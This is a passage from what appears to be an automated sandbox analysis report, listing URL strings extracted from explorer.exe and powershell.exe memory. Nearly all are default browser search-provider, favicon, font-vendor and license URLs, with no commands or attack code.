Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001B.00000002.1017567329.000001FE0020F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
